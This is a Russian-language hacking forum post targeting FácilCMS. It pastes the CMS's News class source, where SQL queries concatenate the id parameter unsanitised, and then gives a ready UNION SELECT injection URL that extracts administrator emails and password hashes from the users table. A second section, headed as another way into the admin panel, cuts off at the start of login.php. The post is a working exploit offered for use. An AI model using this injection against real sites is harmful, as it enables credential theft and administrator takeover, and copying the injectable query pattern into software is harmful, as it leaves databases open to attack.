|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
FácilCMS
sourceforge.net/projects/facil-cms
1. SQL-inj (достаем админа)
News.mysql.class.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] wagner.santos@dotlinux.com.br
* Celina Jorge -> celina.jorge@dotlinux.com.br
*
* ====================================================================
* Facil-CMS is Free Software. You can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by
* the Free Software Foundation (either version 2.0 of the license).
* ====================================================================
*/
[/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]News
[/COLOR][COLOR="#007700"]{
var[/COLOR][COLOR="#0000BB"]$_ID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_LANGUAGE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_TITLE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_RESUME[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_CONTENT[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_PUBLISHER[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_DATE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$_STATUS[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'0'[/COLOR][COLOR="#007700"];
function[/COLOR][COLOR="#0000BB"]__constructor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
if([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getNewInfo[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);
}
}
function[/COLOR][COLOR="#0000BB"]News[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
if([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getNewInfo[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);
}
}
function[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_ID[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setId[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_ID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getLanguage[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_LANGUAGE[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setLanguage[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_LANGUAGE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getTitle[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_TITLE[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_TITLE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getResume[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_RESUME[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setResume[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$resume[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_RESUME[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$resume[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getContent[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_CONTENT[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setContent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_CONTENT[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getPublisher[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_PUBLISHER[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setPublisher[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$publisher[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_PUBLISHER[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$publisher[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getDate[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_DATE[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setDate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_DATE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getStatus[/COLOR][COLOR="#007700"]()
{
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_STATUS[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]setStatus[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_STATUS[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getNewInfo[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]RecordCount[/COLOR][COLOR="#007700"]() ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setContent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'content'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setDate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setId[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setLanguage[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setPublisher[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'publisher'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setResume[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'resume'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setStatus[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'status'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]));
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
}
function[/COLOR][COLOR="#0000BB"]Add[/COLOR][COLOR="#007700"]()
{
if(![/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" (id, language, title, resume, content, publisher, date, status) VALUES (null, '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getLanguage[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getTitle[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getResume[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getContent[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPublisher[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]", NOW(), '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getStatus[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]))
{
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
else
{
die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
}
}
}
function[/COLOR][COLOR="#0000BB"]Erase[/COLOR][COLOR="#007700"]()
{
if([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"DELETE FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]();
if([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]))
{
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
else
{
die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
}
}
}
function[/COLOR][COLOR="#0000BB"]Update[/COLOR][COLOR="#007700"]()
{
if([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" SET language='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getLanguage[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', title='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getTitle[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', resume='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getResume[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', content='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getContent[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"', status='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getStatus[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"' WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]();
if([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]))
{
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
else
{
die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
}
}
}
function[/COLOR][COLOR="#0000BB"]countNews[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT COUNT(*) as Total FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE status='1'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Total'[/COLOR][COLOR="#007700"]);
}
function[/COLOR][COLOR="#0000BB"]listNews[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$start[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
if([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' language="'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'"'[/COLOR][COLOR="#007700"];
}
else
{
[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
if(![/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'UTYPE'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" status='1'"[/COLOR][COLOR="#007700"];
}
else
{
[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
if([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' WHERE'[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"];
}
if([/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
if([/COLOR][COLOR="#0000BB"]$language[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]' AND'[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"];
}
}
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_NEWS_DB_TABLE_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$where[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" ORDER BY date DESC LIMIT "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$start[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]", "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]Execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]ErrorMsg[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]RecordCount[/COLOR][COLOR="#007700"]() >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"]= array();
while(![/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]EOF[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$utils[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]facilUtils[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$utils[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]formatDate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][] = array([/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]MoveNext[/COLOR][COLOR="#007700"]();
}
return[/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"];
}
}
}
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Код:
http://temp/modules.php?modload=News&op=view&id=1+UNION+SELECT+1,2,group_concat(email,0x3a,password+SEPARATOR+0x3c62723e),4,5,6,7,8+FROM+facil_users+WHERE+type=1+--+
2. Другой способ попасть в админку, если не получилось брутануть хэш админа (урл выше).
login.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] wagner.santos@dotlinux.com.br
